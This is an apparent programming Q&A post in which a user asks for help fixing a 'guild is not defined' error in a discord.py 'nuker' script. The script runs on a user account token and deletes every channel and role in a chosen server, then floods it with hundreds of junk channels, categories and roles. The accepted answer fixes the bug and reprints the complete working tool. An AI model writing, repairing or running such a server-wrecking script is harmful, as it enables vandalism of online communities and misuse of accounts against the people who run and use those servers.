# Guild is not defined | discord.py

Tags: python, python-3.x, discord, discord.py

Hello I am warden I was trying to create a id nuker until I had this error called "guild is not defined" can you please analyze the problem and solve it

```
token = input("[!] Token: ")

async def nuke(self):
    guildid = input("[?] Guild Id to nuke: ")
    guild = await client.fetch_guild(guild_id=guildid)
    question = input(f"[?] Are you sure you want to nuke {guild} if not then close the application.")
    for channel in guild.channels:
        try:
           await channel.delete()
           print(c.GREEN+f"[-] CHANNEL: {channel} deleted")
        except:
           print(c.RED+f"[x] CHANNEL: Couldn't delete {channel}")
    for role in guild.roles:
        try:
            await role.delete()
            print(c.GREEN+f"[-] ROLE: {role} deleted")
        except:
            print(c.RED+f"[x] ROLE: Couldn't delete {role}")
    await guild.edit(default_notifications=discord.NotificationLevel.all_messages,verification_level=discord.VerificationLevel.extreme ,name="}﷽﷽﷽", icon=None)
    for x in range(500):
        await guild.create_text_channel(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
        await guild.create_voice_channel(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
        await guild.create_category(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
    for x in range(250):
        await guild.create_role("﷽﷽﷽﷽﷽﷽﷽﷽")
    return
print(f"[!] NUKE: Done nuking {guild}")

try:
  client.run(token, bot=False)
except:
  print("Token Invalid")
```

Answer (score 1, accepted):

This error is happening because you have the following `print` statement outside of the function `nuke`:

```
print(f"[!] NUKE: Done nuking {guild}")
```

`guild` is only defined inside the `nuke` function, the easiest way to solve this problem would be to include that print statement inside your function, just before the `return` statement:

```
async def nuke(self):
    guildid = input("[?] Guild Id to nuke: ")
    guild = await client.fetch_guild(guild_id=guildid)
    question = input(f"[?] Are you sure you want to nuke {guild} if not then close the application.")
    for channel in guild.channels:
        try:
           await channel.delete()
           print(c.GREEN+f"[-] CHANNEL: {channel} deleted")
        except:
           print(c.RED+f"[x] CHANNEL: Couldn't delete {channel}")
    for role in guild.roles:
        try:
            await role.delete()
            print(c.GREEN+f"[-] ROLE: {role} deleted")
        except:
            print(c.RED+f"[x] ROLE: Couldn't delete {role}")
    await guild.edit(default_notifications=discord.NotificationLevel.all_messages,verification_level=discord.VerificationLevel.extreme ,name="}﷽﷽﷽", icon=None)
    for x in range(500):
        await guild.create_text_channel(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
        await guild.create_voice_channel(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
        await guild.create_category(name="﷽﷽﷽﷽﷽﷽﷽﷽﷽")
    for x in range(250):
        await guild.create_role("﷽﷽﷽﷽﷽﷽﷽﷽")
    print(f"[!] NUKE: Done nuking {guild}")
    return
```